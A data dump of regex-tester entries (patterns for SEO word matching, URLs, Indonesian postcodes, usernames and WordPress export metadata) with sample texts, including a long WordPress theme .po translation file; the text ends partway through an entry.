description
stringlengths
0
8.24k
regex
stringlengths
1
26.3k
text
stringlengths
0
2.47M
title
stringlengths
1
150
created_at
stringlengths
24
24
SEO RegExp
(?<!(?=(((f|ht)tps?)\:\/\/?)(www\.?)))Nissan(?![^<\s]+)(?=[^<>]*<)(?!(?:(?!</?(?:a|span)[ >/])(?:.|\n))*</(?:a|span)>)
You know odoo become now http://www.odoo.com. Nissan is car manufacter odoocompany. <p>Nissan</p> <p>Nissan is company and Nissan Micra is product</p> <p><a href="www.Nissan.com">Nissan</a> is company and <span><a href="www.Nissan.com">Nissan</a></span> Micra is product</p> <p><span>Nissan</span></p> <p>Nissan is product <a href="nissan.com">Nissan</a> ignore Nissan</p> <p><a href="nissan.com"><span>Nissan</span></a></p> <p>odoo is a name Company and Nissan Micra is a model of best selling.</p> Company Nissan is a name. and Nissan Micra is model name. Company <a href="nissan.com"><span>Nissan</span></a> is a name. and Nissan Micra is model name. This is new <a href='https://www.url.com'><span>URL</span></a>.<br /> Company Nissan is a name. and Nissan Micra is model name. </p>
SEO RegExp
2016-02-26T06:49:04.000Z
(<[a|A][^>]*>|)(<[a]>)
<a href="http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags?rq=1" class="question-hyperlink">RegEx match open tags except XHTML self-contained tags</a>
html-link-2
2015-09-18T12:43:22.000Z
Follow the instructions to match/don't match the following urls. Then post to comminity with title: [URL CHALLENGE]:<your_name>
(?:[A-Z\s]+\n)
MATCH THE FOLLOWING http://foo.com/blah_blah http://foo.com/blah_blah/ http://foo.com/blah_blah_(wikipedia) http://foo.com/blah_blah_(wikipedia)_(again) http://www.example.com/wpstyle/?p=364 https://www.example.com/foo/?bar=baz&inga=42&quux http://✪df.ws/123 http://userid:[email protected]:8080 http://userid:[email protected]:8080/ http://[email protected] http://[email protected]/ http://[email protected]:8080 http://[email protected]:8080/ http://userid:[email protected] http://userid:[email protected]/ http://142.42.1.1/ http://142.42.1.1:8080/ http://âž¡.ws/䨹 http://⌘.ws http://⌘.ws/ http://foo.com/blah_(wikipedia)#cite-1 http://foo.com/blah_(wikipedia)_blah#cite-1 http://foo.com/unicode_(✪)_in_parens http://foo.com/(something)?after=parens http://☺.damowmow.com/ http://code.google.com/events/#&product=browser http://j.mp ftp://foo.bar/baz http://foo.bar/?q=Test%20URL-encoded%20stuff http://مثال.إختبار http://例子.测试 http://उदाहरण.परीक्षा http://-.~_!$&'()*+,;=:%40:80%2f::::::@example.com http://1337.net http://a.b-c.de http://223.255.255.254 DONT NOT MATCH THE FOLLOWING http:// http://. http://.. http://../ http://? http://?? http://??/ http://# http://## http://##/ http://foo.bar?q=Spaces should be encoded // //a ///a /// http:///a foo.com rdar://1234 h://test http:// shouldfail.com :// should fail http://foo.bar/foo(bar)baz quux ftps://foo.bar/ http://-error-.invalid/ http://a.b--c.de/ http://-a.b.co http://a.b-.co http://0.0.0.0 http://10.1.1.0 http://10.1.1.255 http://224.1.1.1 http://1.1.1.1.1 http://123.123.123 http://3628126748 http://.www.foo.bar/ http://www.foo.bar./ http://.www.foo.bar./ http://10.1.1.1 http://10.1.1.254
URL REGULAR EXPRESSION CHALLENGE
2014-09-19T14:38:02.000Z
(?:101[1-9]([0-9])|[0-9]{2}[1-9][0-7][0-4]|[2-8][0-9]{2}[0-9]{2})
Indonesia Post Code
2015-03-11T15:45:32.000Z
^[\w\-_*+.,]+$
Alphanumeric and -_*+.,
2018-07-24T23:56:41.000Z
username is 4-32 characters long no _,- or . at the beginning no __ or _. or ._ or .. or .- or _- inside no _,- or . at the end ^(?=.{4,32}$)(?![_.-])(?!.*[_.]{2})[a-zA-Z0-9._-]+(?<![_.])$
^(?=.{4,32}$)(?![_.-])(?!.*[_.]{2})[a-zA-Z0-9._-]+(?<![_.])$
sadsd._dfds
Username Validation
2016-01-12T06:21:57.000Z
Allows for easy removal of metadata in WP export file
<(wp:postmeta)>\s*<(wp:meta_key)>\s*wpcf-lookbook-front-image\s*<\/\2>\s*<(wp:meta_value)>[\s\S]*?<\/\3>\s*<\/\1>\s*
<wp:postmeta> <wp:meta_key>wpcf-lookbook-front-image</wp:meta_key> <wp:meta_value><![CDATA[]]></wp:meta_value> </wp:postmeta>
Match arbitary metadata in WordPress export XML
2016-08-15T12:46:01.000Z
(?i)\w*www\w*
Hola esto la repetidoooos.
www
2015-09-03T20:23:12.000Z
(#:|#,).+[\n]*
#, fuzzy msgid "" msgstr "" "Project-Id-Version: \n" "POT-Creation-Date: 2017-12-05 11:39+0700\n" "PO-Revision-Date: 2016-08-17 19:26+0700\n" "Last-Translator: \n" "Language-Team: \n" "Language: en_US\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Poedit 1.8.7.1\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=(n != 1);\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: __;_e;esc_html__;esc_html_e;esc_html_x;_n:1,2;" "_n_noop:1,2;_nx:1,2;_nx_noop:1,2\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" #: comments.php:20 #, php-format msgid "Comment (%1$s)" msgid_plural "Comments (%1$s)" msgstr[0] "" msgstr[1] "" #: comments.php:44 includes/helpers.php:87 msgid "Previous" msgstr "" #: comments.php:45 includes/helpers.php:88 msgid "Next" msgstr "" #: comments.php:57 msgid "Comments are closed." msgstr "" #: default-templates/article.php:29 default-templates/page.php:22 #: default-templates/single.php:26 #: framework-customizations/extensions/articles/articles/article-04/views/view.php:29 #: framework-customizations/extensions/events/views/single.php:90 #: framework-customizations/extensions/faq/views/single.php:16 #: framework-customizations/extensions/portfolio/views/single.php:47 #: framework-customizations/extensions/services/views/single.php:33 #: framework-customizations/extensions/teams/views/single.php:81 msgid "Continue reading" msgstr "" #: default-templates/article.php:36 default-templates/page.php:25 #: default-templates/single.php:30 #: framework-customizations/extensions/articles/articles/article-04/views/view.php:33 #: framework-customizations/extensions/portfolio/views/single.php:51 #: framework-customizations/extensions/posts/posts/post-01/views/view.php:32 #: framework-customizations/extensions/posts/posts/post-02/views/view.php:30 #: framework-customizations/extensions/posts/posts/post-03/views/view.php:32 #: framework-customizations/extensions/posts/posts/post-04/views/view.php:30 #: framework-customizations/extensions/posts/posts/post-05/views/view.php:27 #: framework-customizations/extensions/services/views/single.php:37 msgid "Pages:" msgstr "" #: default-templates/footer.php:12 msgid "&#169; Designed by RubikThemes. All Rights Reserved." msgstr "" #: default-templates/no-content.php:3 msgid "We can&rsquo;t find what you&rsquo;re looking for!" msgstr "" #: default-templates/no-content.php:9 msgid "Ready to publish your first post?" msgstr "" #: default-templates/no-content.php:9 msgid "Get started here" msgstr "" #: default-templates/no-content.php:13 msgid "Please try again with different keywords." msgstr "" #: default-templates/no-content.php:18 msgid "" "It seems we can&rsquo;t find what you&rsquo;re looking for. Perhaps " "searching can help." msgstr "" #: default-templates/page.php:34 #: framework-customizations/extensions/events/views/single.php:94 #: framework-customizations/extensions/faq/views/single.php:39 #: framework-customizations/extensions/posts/posts/post-01/views/view.php:41 #: framework-customizations/extensions/posts/posts/post-02/views/view.php:39 #: framework-customizations/extensions/posts/posts/post-03/views/view.php:41 #: framework-customizations/extensions/posts/posts/post-04/views/view.php:39 #: includes/helpers.php:224 msgid "Edit" msgstr "" #: framework-customizations/extensions/events/hooks.php:11 msgid "Donation" msgstr "" #: framework-customizations/extensions/events/hooks.php:161 #: framework-customizations/extensions/events/hooks.php:193 msgid "Exceeds the ticket class allows" msgstr "" #: framework-customizations/extensions/events/hooks.php:591 msgid "Pending" msgstr "" #: framework-customizations/extensions/events/hooks.php:592 msgid "Approve" msgstr "" #: framework-customizations/extensions/events/hooks.php:596 msgid "All Status" msgstr "" #: framework-customizations/extensions/events/hooks.php:617 msgid "All Events" msgstr "" #: framework-customizations/extensions/events/hooks.php:634 msgid "All Event Categories" msgstr "" #: framework-customizations/extensions/events/hooks.php:651 msgid "Money From" msgstr "" #: framework-customizations/extensions/events/hooks.php:653 msgid "To" msgstr "" #: framework-customizations/extensions/events/hooks.php:727 msgid "Speaker" msgstr "" #: framework-customizations/extensions/events/hooks.php:730 msgid "Name of event speaker." msgstr "" #: framework-customizations/extensions/events/hooks.php:733 msgid "Speaker Image" msgstr "" #: framework-customizations/extensions/events/hooks.php:736 msgid "Image of event speaker." msgstr "" #: framework-customizations/extensions/events/hooks.php:740 msgid "Start And End Of Event" msgstr "" #: framework-customizations/extensions/events/hooks.php:741 msgid "Set start and end events datetime" msgstr "" #: framework-customizations/extensions/events/hooks.php:763 msgid "Event Location" msgstr "" #: framework-customizations/extensions/events/hooks.php:765 msgid "Where does the event take place?" msgstr "" #: framework-customizations/extensions/events/hooks.php:772 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:102 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:124 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:46 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:40 #: framework-customizations/theme/options/course-settings.php:48 #: framework-customizations/theme/options/page-404-settings.php:72 msgid "Description" msgstr "" #: framework-customizations/extensions/events/hooks.php:775 msgid "Event Label" msgstr "" #: framework-customizations/extensions/events/hooks.php:778 msgid "Label of event." msgstr "" #: framework-customizations/extensions/events/hooks.php:787 #: framework-customizations/extensions/footers/footers/footer-01/options.php:86 #: framework-customizations/extensions/footers/footers/footer-01/options.php:210 #: framework-customizations/extensions/footers/footers/footer-01/options.php:337 #: framework-customizations/extensions/footers/footers/footer-02/options.php:85 #: framework-customizations/extensions/footers/footers/footer-02/options.php:209 #: framework-customizations/extensions/footers/footers/footer-02/options.php:330 #: framework-customizations/extensions/footers/footers/footer-03/options.php:85 #: framework-customizations/extensions/footers/footers/footer-03/options.php:209 #: framework-customizations/extensions/footers/footers/footer-03/options.php:318 #: framework-customizations/extensions/footers/footers/footer-04/options.php:85 #: framework-customizations/extensions/footers/footers/footer-04/options.php:209 #: framework-customizations/extensions/footers/footers/footer-04/options.php:322 #: framework-customizations/theme/options/general-settings.php:223 msgid "Custom Style" msgstr "" #: framework-customizations/extensions/events/hooks.php:788 #: framework-customizations/theme/options/general-settings.php:224 msgid "Change the style / typography of this shortcode" msgstr "" #: framework-customizations/extensions/events/hooks.php:789 #: framework-customizations/extensions/footers/footers/footer-01/options.php:88 #: framework-customizations/extensions/footers/footers/footer-01/options.php:212 #: framework-customizations/extensions/footers/footers/footer-01/options.php:339 #: framework-customizations/extensions/footers/footers/footer-02/options.php:87 #: framework-customizations/extensions/footers/footers/footer-02/options.php:211 #: framework-customizations/extensions/footers/footers/footer-02/options.php:332 #: framework-customizations/extensions/footers/footers/footer-03/options.php:87 #: framework-customizations/extensions/footers/footers/footer-03/options.php:211 #: framework-customizations/extensions/footers/footers/footer-03/options.php:320 #: framework-customizations/extensions/footers/footers/footer-04/options.php:87 #: framework-customizations/extensions/footers/footers/footer-04/options.php:211 #: framework-customizations/extensions/footers/footers/footer-04/options.php:324 #: framework-customizations/theme/options/general-settings.php:225 #: framework-customizations/theme/options/page-header-settings.php:169 #: framework-customizations/theme/options/page-header-settings.php:241 msgid "Styling" msgstr "" #: framework-customizations/extensions/events/hooks.php:795 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:25 #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:86 #: framework-customizations/extensions/portfolio/config.php:155 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:67 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:231 #: framework-customizations/theme/options/general-settings.php:234 #: framework-customizations/theme/options/general-settings.php:394 #: framework-customizations/theme/options/general-settings.php:457 #: framework-customizations/theme/options/taxonomies/cat_course.php:15 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:23 #: includes/hooks.php:436 msgid "Icon" msgstr "" #: framework-customizations/extensions/events/hooks.php:796 msgid "Select icon for label." msgstr "" #: framework-customizations/extensions/events/hooks.php:799 #: framework-customizations/extensions/footers/footers/footer-01/options.php:92 #: framework-customizations/extensions/footers/footers/footer-01/options.php:343 #: framework-customizations/extensions/footers/footers/footer-01/options.php:504 #: framework-customizations/extensions/footers/footers/footer-01/options.php:657 #: framework-customizations/extensions/footers/footers/footer-01/options.php:810 #: framework-customizations/extensions/footers/footers/footer-02/options.php:91 #: framework-customizations/extensions/footers/footers/footer-02/options.php:336 #: framework-customizations/extensions/footers/footers/footer-02/options.php:497 #: framework-customizations/extensions/footers/footers/footer-02/options.php:649 #: framework-customizations/extensions/footers/footers/footer-02/options.php:801 #: framework-customizations/extensions/footers/footers/footer-03/options.php:91 #: framework-customizations/extensions/footers/footers/footer-03/options.php:324 #: framework-customizations/extensions/footers/footers/footer-03/options.php:485 #: framework-customizations/extensions/footers/footers/footer-03/options.php:637 #: framework-customizations/extensions/footers/footers/footer-03/options.php:789 #: framework-customizations/extensions/footers/footers/footer-04/options.php:91 #: framework-customizations/extensions/footers/footers/footer-04/options.php:328 #: framework-customizations/extensions/footers/footers/footer-04/options.php:489 #: framework-customizations/extensions/footers/footers/footer-04/options.php:641 #: framework-customizations/extensions/footers/footers/footer-04/options.php:793 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:161 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:232 #: framework-customizations/extensions/headers/headers/header-09/options.php:165 #: framework-customizations/extensions/headers/headers/header-09/options.php:236 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:88 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:78 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:74 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:34 #: framework-customizations/theme/options/general-settings.php:66 #: framework-customizations/theme/options/general-settings.php:263 #: framework-customizations/theme/options/page-boxed-layout.php:42 #: framework-customizations/theme/options/page-header-settings.php:44 #: framework-customizations/theme/options/posts/page.php:119 msgid "Background Color" msgstr "" #: framework-customizations/extensions/events/hooks.php:800 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:162 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:233 #: framework-customizations/extensions/headers/headers/header-09/options.php:166 #: framework-customizations/extensions/headers/headers/header-09/options.php:237 #: framework-customizations/theme/options/general-settings.php:264 msgid "Select the background color" msgstr "" #: framework-customizations/extensions/events/hooks.php:806 #: framework-customizations/extensions/footers/footers/footer-01/options.php:125 #: framework-customizations/extensions/footers/footers/footer-01/options.php:375 #: framework-customizations/extensions/footers/footers/footer-01/options.php:511 #: framework-customizations/extensions/footers/footers/footer-01/options.php:664 #: framework-customizations/extensions/footers/footers/footer-01/options.php:817 #: framework-customizations/extensions/footers/footers/footer-02/options.php:124 #: framework-customizations/extensions/footers/footers/footer-02/options.php:368 #: framework-customizations/extensions/footers/footers/footer-02/options.php:504 #: framework-customizations/extensions/footers/footers/footer-02/options.php:656 #: framework-customizations/extensions/footers/footers/footer-02/options.php:808 #: framework-customizations/extensions/footers/footers/footer-03/options.php:124 #: framework-customizations/extensions/footers/footers/footer-03/options.php:356 #: framework-customizations/extensions/footers/footers/footer-03/options.php:492 #: framework-customizations/extensions/footers/footers/footer-03/options.php:644 #: framework-customizations/extensions/footers/footers/footer-03/options.php:796 #: framework-customizations/extensions/footers/footers/footer-04/options.php:124 #: framework-customizations/extensions/footers/footers/footer-04/options.php:360 #: framework-customizations/extensions/footers/footers/footer-04/options.php:496 #: framework-customizations/extensions/footers/footers/footer-04/options.php:648 #: framework-customizations/extensions/footers/footers/footer-04/options.php:800 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:54 #: framework-customizations/theme/options/general-settings.php:270 msgid "Text Color" msgstr "" #: framework-customizations/extensions/events/hooks.php:807 #: framework-customizations/theme/options/general-settings.php:271 msgid "Select the text color" msgstr "" #: framework-customizations/extensions/events/hooks.php:817 msgid "Hide Event When Expired" msgstr "" #: framework-customizations/extensions/events/hooks.php:818 #: framework-customizations/extensions/events/shortcodes/event-block/config.php:46 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:13 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:155 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:165 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:174 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:184 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:8 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-1.php:3 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:3 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:6 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:13 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:12 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:11 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:4 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:9 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:87 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:98 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:109 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:120 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:131 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:142 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:153 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:177 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:193 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:209 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:225 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:122 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:130 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:138 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:150 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:290 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:303 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:317 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:331 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:96 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:88 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:66 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:163 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:108 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:4 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:12 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:5 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:10 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:8 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:14 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:9 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:8 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:5 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:10 #: framework-customizations/theme/options/advertisement-settings.php:72 #: framework-customizations/theme/options/general-settings.php:116 #: framework-customizations/theme/options/general-settings.php:130 #: framework-customizations/theme/options/post-settings.php:268 #: framework-customizations/theme/options/post-settings.php:282 #: framework-customizations/theme/options/post-settings.php:296 #: framework-customizations/theme/options/post-settings.php:310 #: framework-customizations/theme/options/post-settings.php:485 #: framework-customizations/theme/options/theme-requirements.php:21 #: framework-customizations/theme/options/theme-requirements.php:29 #: framework-customizations/theme/options/theme-requirements.php:98 #: framework-customizations/theme/options/theme-requirements.php:135 #: framework-customizations/theme/options/theme-requirements.php:247 msgid "Yes" msgstr "" #: framework-customizations/extensions/events/hooks.php:825 msgid "Ticket Price" msgstr "" #: framework-customizations/extensions/events/hooks.php:828 #: framework-customizations/extensions/events/hooks.php:835 msgid "Price to sale the ticket of the event" msgstr "" #: framework-customizations/extensions/events/hooks.php:832 msgid "Ticket Promotion Price" msgstr "" #: framework-customizations/extensions/events/hooks.php:839 msgid "Number Ticket" msgstr "" #: framework-customizations/extensions/events/hooks.php:842 msgid "Number of the ticket of the event" msgstr "" #: framework-customizations/extensions/events/hooks.php:846 msgid "Button Buy Ticket Text" msgstr "" #: framework-customizations/extensions/events/hooks.php:848 #: framework-customizations/extensions/events/includes/class-slz-event.php:496 msgid "Buy Ticket" msgstr "" #: framework-customizations/extensions/events/hooks.php:849 msgid "Input text for Buy Ticket button" msgstr "" #: framework-customizations/extensions/events/hooks.php:852 msgid "Button Buy Ticket URL" msgstr "" #: framework-customizations/extensions/events/hooks.php:854 msgid "Input URL for payment method on button Buy Ticket" msgstr "" #: framework-customizations/extensions/events/hooks.php:860 #: framework-customizations/extensions/portfolio/config.php:125 #: framework-customizations/theme/options/general-settings.php:7 #: framework-customizations/theme/options/general-settings.php:11 #: framework-customizations/theme/options/page-header-settings.php:312 #: framework-customizations/theme/options/template-settings.php:216 msgid "General" msgstr "" #: framework-customizations/extensions/events/hooks.php:865 msgid "Ticket" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:231 #: framework-customizations/extensions/events/views/single.php:258 #: framework-customizations/extensions/portfolio/views/course-info.php:65 msgid "Price:" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:231 msgid "from " msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:234 msgid "Donation Now" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:490 #: framework-customizations/extensions/events/includes/class-slz-event.php:983 msgid "Buy ticket" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:511 msgid "Ticket Prices" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1080 msgid "Event Host" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1143 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/views/view.php:14 msgid "days" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1150 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/views/view.php:22 msgid "hours" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1157 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/views/view.php:30 msgid "mins" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1164 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:56 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/views/view.php:38 msgid "secs" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1202 #: framework-customizations/extensions/events/includes/class-slz-event.php:1271 msgid "Donate now" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1249 msgid "Events Donation" msgstr "" #: framework-customizations/extensions/events/includes/class-slz-event.php:1254 msgid "How much would you like to donate?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:8 msgid "SLZ Events Block" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:9 msgid "List of events" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:16 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:18 #: framework-customizations/extensions/headers/headers/header-09/options/button.php:13 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:13 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:15 #: framework-customizations/extensions/lema/shortcodes/course-collection/config.php:39 #: framework-customizations/extensions/lema/shortcodes/featured-course/config.php:41 #: framework-customizations/extensions/lema/shortcodes/instructor/config.php:42 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:57 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/config.php:16 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-carousel/config.php:24 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/config.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/config.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/config.php:16 #: framework-customizations/extensions/shortcodes/shortcodes/button/config.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/contact/config.php:27 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/config.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/config.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/config.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/map/config.php:10 #: framework-customizations/extensions/shortcodes/shortcodes/partner/config.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/config.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/config.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/config.php:16 #: framework-customizations/extensions/shortcodes/shortcodes/video/config.php:14 #: framework-customizations/extensions/teams/shortcodes/team-block/config.php:27 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:18 #: framework-customizations/extensions/widgets/widgets/button/config.php:13 #: framework-customizations/theme/options/page-404-settings.php:29 #: framework-customizations/theme/options/page-header-settings.php:25 #: framework-customizations/theme/options/page-options.php:78 msgid "United States" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:17 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:19 #: framework-customizations/extensions/lema/shortcodes/course-collection/config.php:40 #: framework-customizations/extensions/lema/shortcodes/featured-course/config.php:42 #: framework-customizations/extensions/lema/shortcodes/instructor/config.php:43 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:58 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/config.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/config.php:23 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/config.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/button/config.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/contact/config.php:28 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/config.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/config.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/map/config.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:60 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/config.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/config.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/video/config.php:15 #: framework-customizations/extensions/teams/shortcodes/team-block/config.php:28 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:19 #: framework-customizations/extensions/widgets/widgets/button/config.php:14 #: framework-customizations/theme/options/page-404-settings.php:30 msgid "India" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:18 #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:16 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:20 #: framework-customizations/extensions/lema/shortcodes/course-collection/config.php:41 #: framework-customizations/extensions/shortcodes/shortcodes/button/config.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/contact/config.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/config.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/config.php:20 #: framework-customizations/extensions/teams/shortcodes/team-block/config.php:29 #: framework-customizations/extensions/widgets/widgets/button/config.php:15 msgid "United Kingdom" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:35 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:102 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:112 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:113 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:123 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:124 #: 